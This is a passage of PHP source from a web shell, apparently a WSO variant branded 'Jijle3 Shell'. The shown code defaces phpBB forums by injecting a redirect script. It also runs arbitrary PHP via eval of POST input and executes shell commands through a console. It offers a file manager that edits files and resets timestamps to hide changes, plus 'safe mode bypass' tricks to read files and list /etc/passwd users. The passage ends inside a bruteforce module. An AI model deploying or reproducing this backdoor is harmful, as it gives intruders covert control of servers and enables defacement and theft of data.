2565$db2 =@ mysql_select_db($database2,$con2) or die;
2566$query2 = "UPDATE $phpbb SET forum_name = '<script>location.href=\"$index2\"</script>'" or die;
2567$result2 =@ mysql_query($query2,$con2);
2568if($result2){
2569echo "<p align='center'>
2570<marquee behavior='alternate' bgcolor='#FF0000' style='color: #000000; font-weight: bold'>[ Mr.511 ]----[ Update Finish ]----[ Mr.511 ]</marquee></p>";
2571}
2572else {
2573echo "<p align='center'><marquee behavior='alternate' bgcolor='#FF0000' style='color: #000000; font-weight: bold'>[ Mr.511 ]----[ Please Check Database Information ]----[ Mr.511 ]</marquee></p>";
2574}
2575}
2576//Greetz to FoX HACKER
2577//Coded by Mr.511
2578//x08d@hotmail.CoM
2579wsoFooter();}
2580##########################################################
2581function actionPhp() {
2582 if(isset($_POST['ajax'])) {
2583 $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = true;
2584 ob_start();
2585 eval($_POST['p1']);
2586 $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\0") . "';\n";
2587 echo strlen($temp), "\n", $temp;
2588 exit;
2589 }
2590 wsoHeader();
2591 if(isset($_POST['p2']) && ($_POST['p2'] == 'info')) {
2592 echo '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>';
2593 ob_start();
2594 phpinfo();
2595 $tmp = ob_get_clean();
2596 $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
2597 $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
2598 echo str_replace('<h1','<h2', $tmp) .'</div><br>';
2599 }
2600 if(empty($_POST['ajax']) && !empty($_POST['p1']))
2601 $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false;
2602 echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Exec style="margin-top:5px">';
2603 echo ' <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
2604 if(!empty($_POST['p1'])) {
2605 ob_start();
2606 eval($_POST['p1']);
2607 echo htmlspecialchars(ob_get_clean());
2608 }
2609 echo '</pre></div>';
2610 wsoFooter();
2611}
2612function actionFilesMan() {
2613 wsoHeader();
2614 echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>';
2615 if(!empty($_POST['p1'])) {
2616 switch($_POST['p1']) {
2617 case 'uploadFile':
2618 if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
2619 echo "Can't upload file!";
2620 break;
2621 case 'mkdir':
2622 if(!@mkdir($_POST['p2']))
2623 echo "Can't create new dir";
2624 break;
2625 case 'delete':
2626 function deleteDir($path) {
2627 $path = (substr($path,-1)=='/') ? $path:$path.'/';
2628 $dh = opendir($path);
2629 while ( ($item = readdir($dh) ) !== false) {
2630 $item = $path.$item;
2631 if ( (basename($item) == "..") || (basename($item) == ".") )
2632 continue;
2633 $type = filetype($item);
2634 if ($type == "dir")
2635 deleteDir($item);
2636 else
2637 @unlink($item);
2638 }
2639 closedir($dh);
2640 @rmdir($path);
2641 }
2642 if(is_array(@$_POST['f']))
2643 foreach($_POST['f'] as $f) {
2644 if($f == '..')
2645 continue;
2646 $f = urldecode($f);
2647 if(is_dir($f))
2648 deleteDir($f);
2649 else
2650 @unlink($f);
2651 }
2652 break;
2653 case 'paste':
2654 if($_SESSION['act'] == 'copy') {
2655 function copy_paste($c,$s,$d){
2656 if(is_dir($c.$s)){
2657 mkdir($d.$s);
2658 $h = @opendir($c.$s);
2659 while (($f = @readdir($h)) !== false)
2660 if (($f != ".") and ($f != ".."))
2661 copy_paste($c.$s.'/',$f, $d.$s.'/');
2662 } elseif(is_file($c.$s))
2663 @copy($c.$s, $d.$s);
2664 }
2665 foreach($_SESSION['f'] as $f)
2666 copy_paste($_SESSION['c'],$f, $GLOBALS['cwd']);
2667 } elseif($_SESSION['act'] == 'move') {
2668 function move_paste($c,$s,$d){
2669 if(is_dir($c.$s)){
2670 mkdir($d.$s);
2671 $h = @opendir($c.$s);
2672 while (($f = @readdir($h)) !== false)
2673 if (($f != ".") and ($f != ".."))
2674 copy_paste($c.$s.'/',$f, $d.$s.'/');
2675 } elseif(@is_file($c.$s))
2676 @copy($c.$s, $d.$s);
2677 }
2678 foreach($_SESSION['f'] as $f)
2679 @rename($_SESSION['c'].$f, $GLOBALS['cwd'].$f);
2680 } elseif($_SESSION['act'] == 'zip') {
2681 if(class_exists('ZipArchive')) {
2682 $zip = new ZipArchive();
2683 if ($zip->open($_POST['p2'], 1)) {
2684 chdir($_SESSION['c']);
2685 foreach($_SESSION['f'] as $f) {
2686 if($f == '..')
2687 continue;
2688 if(@is_file($_SESSION['c'].$f))
2689 $zip->addFile($_SESSION['c'].$f, $f);
2690 elseif(@is_dir($_SESSION['c'].$f)) {
2691 $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/'));
2692 foreach ($iterator as $key=>$value) {
2693 $zip->addFile(realpath($key), $key);
2694 }
2695 }
2696 }
2697 chdir($GLOBALS['cwd']);
2698 $zip->close();
2699 }
2700 }
2701 } elseif($_SESSION['act'] == 'unzip') {
2702 if(class_exists('ZipArchive')) {
2703 $zip = new ZipArchive();
2704 foreach($_SESSION['f'] as $f) {
2705 if($zip->open($_SESSION['c'].$f)) {
2706 $zip->extractTo($GLOBALS['cwd']);
2707 $zip->close();
2708 }
2709 }
2710 }
2711 } elseif($_SESSION['act'] == 'tar') {
2712 chdir($_SESSION['c']);
2713 $_SESSION['f'] = array_map('escapeshellarg', $_SESSION['f']);
2714 wsoEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_SESSION['f']));
2715 chdir($GLOBALS['cwd']);
2716 }
2717 unset($_SESSION['f']);
2718 break;
2719 default:
2720 if(!empty($_POST['p1'])) {
2721 $_SESSION['act'] = @$_POST['p1'];
2722 $_SESSION['f'] = @$_POST['f'];
2723 foreach($_SESSION['f'] as $k => $f)
2724 $_SESSION['f'][$k] = urldecode($f);
2725 $_SESSION['c'] = @$_POST['c'];
2726 }
2727 break;
2728 }
2729 }
2730 $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
2731 if($dirContent === false) { echo 'Can\'t open this folder!';wsoFooter(); return; }
2732 global $sort;
2733 $sort = array('name', 1);
2734 if(!empty($_POST['p1'])) {
2735 if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
2736 $sort = array($match[1], (int)$match[2]);
2737 }
2738echo "<script>
2739 function sa() {
2740 for(i=0;i<d.files.elements.length;i++)
2741 if(d.files.elements[i].type == 'checkbox')
2742 d.files.elements[i].checked = d.files.elements[0].checked;
2743 }
2744</script>
2745<table width='100%' class='main' cellspacing='0' cellpadding='2'>
2746<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
2747$dirs = $files = array();
2748 $n = count($dirContent);
2749 for($i=0;$i<$n;$i++) {
2750 $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
2751 $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
2752 $tmp = array('name' => $dirContent[$i],
2753 'path' => $GLOBALS['cwd'].$dirContent[$i],
2754 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])),
2755 'perms' => wsoPermsColor($GLOBALS['cwd'] . $dirContent[$i]),
2756 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
2757 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
2758 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
2759 );
2760 if(@is_file($GLOBALS['cwd'] . $dirContent[$i]))
2761 $files[] = array_merge($tmp, array('type' => 'file'));
2762 elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i]))
2763 $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
2764 elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])&& ($dirContent[$i] != "."))
2765 $dirs[] = array_merge($tmp, array('type' => 'dir'));
2766 }
2767 $GLOBALS['sort'] = $sort;
2768 function wsoCmp($a, $b) {
2769 if($GLOBALS['sort'][0] != 'size')
2770 return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
2771 else
2772 return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
2773 }
2774 usort($files, "wsoCmp");
2775 usort($dirs, "wsoCmp");
2776 $files = array_merge($dirs, $files);
2777 $l = 0;
2778 foreach($files as $f) {
2779 echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" title=' . $f['link'] . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>').'</a></td><td>'.(($f['type']=='file')?wsoViewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
2780 .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
2781 $l = $l?0:1;
2782 }
2783 echo "<tr><td colspan=7>
2784
2785 <input type=hidden name=a value='FilesMan'>
2786 <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'>
2787 <input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
2788 <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";
2789 if(class_exists('ZipArchive'))
2790 echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>";
2791 echo "<option value='tar'>Compress (tar.gz)</option>";
2792 if(!empty($_SESSION['act']) && @count($_SESSION['f']))
2793 echo "<option value='paste'>Paste / Compress</option>";
2794 echo "</select> ";
2795 if(!empty($_SESSION['act']) && @count($_SESSION['f']) && (($_SESSION['act'] == 'zip') || ($_SESSION['act'] == 'tar')))
2796 echo "file name: <input type=text name=p2 value='wso_" . date("Ymd_His") . "." . ($_SESSION['act'] == 'zip'?'zip':'tar.gz') . "'> ";
2797 echo "<input type='submit' value='>>'></td></tr></form></table></div>";
2798 wsoFooter();
2799}
2800########################## String ##############################
2801function actionStringTools() {
2802 if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
2803 if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}}
2804 if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
2805 if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}}
2806 if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
2807 $stringTools = array(
2808 'Base64 encode' => 'base64_encode',
2809 'Base64 decode' => 'base64_decode',
2810 'Url encode' => 'urlencode',
2811 'Url decode' => 'urldecode',
2812 'Full urlencode' => 'full_urlencode',
2813 'md5 hash' => 'md5',
2814 'sha1 hash' => 'sha1',
2815 'crypt' => 'crypt',
2816 'CRC32' => 'crc32',
2817 'ASCII to HEX' => 'ascii2hex',
2818 'HEX to ASCII' => 'hex2ascii',
2819 'HEX to DEC' => 'hexdec',
2820 'HEX to BIN' => 'hex2bin',
2821 'DEC to HEX' => 'dechex',
2822 'DEC to BIN' => 'decbin',
2823 'BIN to HEX' => 'binhex',
2824 'BIN to DEC' => 'bindec',
2825 'String to lower case' => 'strtolower',
2826 'String to upper case' => 'strtoupper',
2827 'Htmlspecialchars' => 'htmlspecialchars',
2828 'String length' => 'strlen',
2829 );
2830 if(isset($_POST['ajax'])) {
2831 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
2832 ob_start();
2833 if(in_array($_POST['p1'], $stringTools))
2834 echo $_POST['p1']($_POST['p2']);
2835 $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
2836 echo strlen($temp), "\n", $temp;
2837 exit;
2838 }
2839 wsoHeader();
2840 echo '<h1>String conversions</h1><div class=content>';
2841 if(empty($_POST['ajax'])&&!empty($_POST['p1']))
2842 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
2843 echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
2844 foreach($stringTools as $k => $v)
2845 echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
2846 echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
2847 if(!empty($_POST['p1'])) {
2848 if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
2849 }
2850 function wsoRecursiveGlob($path) {
2851 if(substr($path, -1) != '/')
2852 $path.='/';
2853 $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR)));
2854 if(is_array($paths)&&@count($paths)) {
2855 foreach($paths as $item) {
2856 if(@is_dir($item)){
2857 if($path!=$item)
2858 wsoRecursiveGlob($item);
2859 } else {
2860 if(@strpos(@file_get_contents($item), @$_POST['p2'])!==false)
2861 echo "<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($item)."\", \"view\")'>".htmlspecialchars($item)."</a><br>";
2862 }
2863 }
2864 }
2865 }
2866 if(@$_POST['p3'])
2867 wsoRecursiveGlob($_POST['c']);
2868 echo "</div><br><h1>Best Hash Search Engine :</h1><div class=content>
2869
2870 <form method='post' target='_blank' name='hf'>
2871 <input type='text' name='hash' style='width:200px;'><br>
2872 <input type='button' value='hashcrack.com' onclick=\"document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()\"><br>
2873 <input type='button' value='hashcracking.info' onclick=\"document.hf.action='https://hashcracking.info/index.php';document.hf.submit()\"><br>
2874 <input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>
2875 <input type='button' value='md5decrypter.com' onclick=\"document.hf.action='http://www.md5decrypter.com/';document.hf.submit()\"><br>
2876 </form></div>";
2877 wsoFooter();
2878}
2879
2880function actionFilesTools() {
2881 if( isset($_POST['p1']) )
2882 $_POST['p1'] = urldecode($_POST['p1']);
2883 if(@$_POST['p2']=='download') {
2884 if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
2885 ob_start("ob_gzhandler", 4096);
2886 header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
2887 if (function_exists("mime_content_type")) {
2888 $type = @mime_content_type($_POST['p1']);
2889 header("Content-Type: " . $type);
2890 } else
2891 header("Content-Type: application/octet-stream");
2892 $fp = @fopen($_POST['p1'], "r");
2893 if($fp) {
2894 while(!@feof($fp))
2895 echo @fread($fp, 1024);
2896 fclose($fp);
2897 }
2898 }exit;
2899 }
2900 if( @$_POST['p2'] == 'mkfile' ) {
2901 if(!file_exists($_POST['p1'])) {
2902 $fp = @fopen($_POST['p1'], 'w');
2903 if($fp) {
2904 $_POST['p2'] = "edit";
2905 fclose($fp);
2906 }
2907 }
2908 }
2909 wsoHeader();
2910 echo '<h1>File Tools</h1><div class=content>';
2911 if( !file_exists(@$_POST['p1']) ) {
2912 echo 'File not exists';
2913 wsoFooter();
2914 return;
2915 }
2916 $uid = @posix_getpwuid(@fileowner($_POST['p1']));
2917 if(!$uid) {
2918 $uid['name'] = @fileowner($_POST['p1']);
2919 $gid['name'] = @filegroup($_POST['p1']);
2920 } else $gid = @posix_getgrgid(@filegroup($_POST['p1']));
2921 echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?wsoViewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.wsoPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
2922 echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
2923 if( empty($_POST['p2']) )
2924 $_POST['p2'] = 'view';
2925 if( is_file($_POST['p1']) )
2926 $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
2927 else
2928 $m = array('Chmod', 'Rename', 'Touch');
2929 foreach($m as $v)
2930 echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
2931 echo '<br><br>';
2932 switch($_POST['p2']) {
2933 case 'view':
2934 echo '<pre class=ml1>';
2935 $fp = @fopen($_POST['p1'], 'r');
2936 if($fp) {
2937 while( !@feof($fp) )
2938 echo htmlspecialchars(@fread($fp, 1024));
2939 @fclose($fp);
2940 }
2941 echo '</pre>';
2942 break;
2943 case 'highlight':
2944 if( @is_readable($_POST['p1']) ) {
2945 echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
2946 $code = @highlight_file($_POST['p1'],true);
2947 echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
2948 }
2949 break;
2950 case 'chmod':
2951 if( !empty($_POST['p3']) ) {
2952 $perms = 0;
2953 for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
2954 $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
2955 if(!@chmod($_POST['p1'], $perms))
2956 echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
2957 }
2958 clearstatcache();
2959 echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
2960 break;
2961 case 'edit':
2962 if( !is_writable($_POST['p1'])) {
2963 echo 'File isn\'t writeable';
2964 break;
2965 }
2966 if( !empty($_POST['p3']) ) {
2967 $time = @filemtime($_POST['p1']);
2968 $_POST['p3'] = substr($_POST['p3'],1);
2969 $fp = @fopen($_POST['p1'],"w");
2970 if($fp) {
2971 @fwrite($fp,$_POST['p3']);
2972 @fclose($fp);
2973 echo 'Saved!<br><script>p3_="";</script>';
2974 @touch($_POST['p1'],$time,$time);
2975 }
2976 }
2977 echo '<form onsubmit="g(null,null,null,null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
2978 $fp = @fopen($_POST['p1'], 'r');
2979 if($fp) {
2980 while( !@feof($fp) )
2981 echo htmlspecialchars(@fread($fp, 1024));
2982 @fclose($fp);
2983 }
2984 echo '</textarea><input type=submit value=">>"></form>';
2985 break;
2986 case 'hexdump':
2987 $c = @file_get_contents($_POST['p1']);
2988 $n = 0;
2989 $h = array('00000000<br>','','');
2990 $len = strlen($c);
2991 for ($i=0; $i<$len; ++$i) {
2992 $h[1] .= sprintf('%02X',ord($c[$i])).' ';
2993 switch ( ord($c[$i]) ) {
2994 case 0: $h[2] .= ' '; break;
2995 case 9: $h[2] .= ' '; break;
2996 case 10: $h[2] .= ' '; break;
2997 case 13: $h[2] .= ' '; break;
2998 default: $h[2] .= $c[$i]; break;
2999 }
3000 $n++;
3001 if ($n == 32) {
3002 $n = 0;
3003 if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
3004 $h[1] .= '<br>';
3005 $h[2] .= "\n";
3006 }
3007 }
3008 echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
3009 break;
3010 case 'rename':
3011 if( !empty($_POST['p3']) ) {
3012 if(!@rename($_POST['p1'], $_POST['p3']))
3013 echo 'Can\'t rename!<br>';
3014 else
3015 die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
3016 }
3017 echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
3018 break;
3019 case 'touch':
3020 if( !empty($_POST['p3']) ) {
3021 $time = strtotime($_POST['p3']);
3022 if($time) {
3023 if(!touch($_POST['p1'],$time,$time))
3024 echo 'Fail!';
3025 else
3026 echo 'Touched!';
3027 } else echo 'Bad time format!';
3028 }
3029 clearstatcache();
3030 echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
3031 break;
3032 }
3033 echo '</div>';
3034 wsoFooter();
3035}
3036
3037function actionSafeMode() {
3038 $temp='';
3039 ob_start();
3040 switch($_POST['p1']) {
3041 case 1:
3042 $temp=@tempnam($test, 'cx');
3043 if(@copy("compress.zlib://".$_POST['p2'], $temp)){
3044 echo @file_get_contents($temp);
3045 unlink($temp);
3046 } else
3047 echo 'Sorry... Can\'t open file';
3048 break;
3049 case 2:
3050 $files = glob($_POST['p2'].'*');
3051 if( is_array($files) )
3052 foreach ($files as $filename)
3053 echo $filename."\n";
3054 break;
3055 case 3:
3056 $ch = curl_init("file://".$_POST['p2']."\x00".preg_replace('!\(\d+\)\s.*!', '', __FILE__));
3057 curl_exec($ch);
3058 break;
3059 case 4:
3060 ini_restore("safe_mode");
3061 ini_restore("open_basedir");
3062 include($_POST['p2']);
3063 break;
3064 case 5:
3065 for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
3066 $uid = @posix_getpwuid($_POST['p2']);
3067 if ($uid)
3068 echo join(':',$uid)."\n";
3069 }
3070 break;
3071 }
3072 $temp = ob_get_clean();
3073 wsoHeader();
3074 echo '<h1>Safe mode bypass</h1><div class=content>';
3075 echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>';
3076 if($temp)
3077 echo '<pre class="ml1" style="margin-top:5px" id="Output">'.htmlspecialchars($temp).'</pre>';
3078 echo '</div>';
3079 wsoFooter();
3080}
3081
3082
3083
3084function actionConsole() {
3085 if(!empty($_POST['p1']) && !empty($_POST['p2'])) {
3086 $_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out'] = true;
3087 $_POST['p1'] .= ' 2>&1';
3088 } elseif(!empty($_POST['p1']))
3089 $_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out'] = false;
3090
3091 if(isset($_POST['ajax'])) {
3092 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
3093 ob_start();
3094 echo "d.cf.cmd.value='';\n";
3095 $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".wsoEx($_POST['p1']),"\n\r\t\\'\0"));
3096 if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {
3097 if(@chdir($match[1])) {
3098 $GLOBALS['cwd'] = @getcwd();
3099 echo "c_='".$GLOBALS['cwd']."';";
3100 }
3101 }
3102 echo "d.cf.output.value+='".$temp."';";
3103 echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";
3104 $temp = ob_get_clean();
3105 echo strlen($temp), "\n", $temp;
3106 exit;
3107 }
3108 wsoHeader();
3109 echo "<script>
3110if(window.Event) window.captureEvents(Event.KEYDOWN);
3111var cmds = new Array('');
3112var cur = 0;
3113function kp(e) {
3114 var n = (window.Event) ? e.which : e.keyCode;
3115 if(n == 38) {
3116 cur--;
3117 if(cur>=0)
3118 document.cf.cmd.value = cmds[cur];
3119 else
3120 cur++;
3121 } else if(n == 40) {
3122 cur++;
3123 if(cur < cmds.length)
3124 document.cf.cmd.value = cmds[cur];
3125 else
3126 cur--;
3127 }
3128}
3129function add(cmd) {
3130 cmds.pop();
3131 cmds.push(cmd);
3132 cmds.push('');
3133 cur = cmds.length-1;
3134}
3135
3136</script>";
3137 echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>';
3138 foreach($GLOBALS['aliases'] as $n => $v) {
3139 if($v == '') {
3140 echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
3141 continue;
3142 }
3143 echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
3144 }
3145 if(empty($_POST['ajax'])&&!empty($_POST['p1']))
3146 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
3147 echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 '.(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
3148 if(!empty($_POST['p1'])) {
3149 echo htmlspecialchars("$ ".$_POST['p1']."\n".wsoEx($_POST['p1']));
3150 }
3151 echo '</textarea><table cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>';
3152 echo '</form></div><script>d.cf.cmd.focus();</script>';
3153 wsoFooter();
3154}
3155
3156function actionLogout() {
3157 session_destroy();
3158 die('bye!');
3159}
3160
3161function actionSelfRemove() {
3162
3163 if($_POST['p1'] == 'yes')
3164 if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
3165 die('Salam Alaykoum ! See You Soon ♥');
3166 else
3167 echo 'unlink error!';
3168 if($_POST['p1'] != 'yes')
3169 wsoHeader();
3170 echo '<h1>Suicide</h1><div class=content>Do You Want To Delete Jijle3 Shell ?<br><a href=# onclick="g(null,null,\'yes\')">Yes Please</a></div>';
3171 wsoFooter();
3172}
3173
3174function actionBruteforce() {
3175 wsoHeader();
3176 if( isset($_POST['proto']) ) {
3177 echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
3178 if( $_POST['proto'] == 'ftp' ) {
